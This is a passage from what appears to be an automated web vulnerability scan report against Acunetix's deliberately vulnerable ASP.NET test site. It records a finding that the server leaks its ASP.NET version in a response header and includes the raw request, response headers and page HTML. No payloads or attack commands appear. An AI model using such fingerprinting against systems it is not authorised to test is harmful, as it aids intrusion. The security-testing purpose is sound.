          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        11. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17827
          
          
          Response body (17827 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK30rH2AgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9jwc/cRnTJwdNTwN8SPSTaigKqpw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 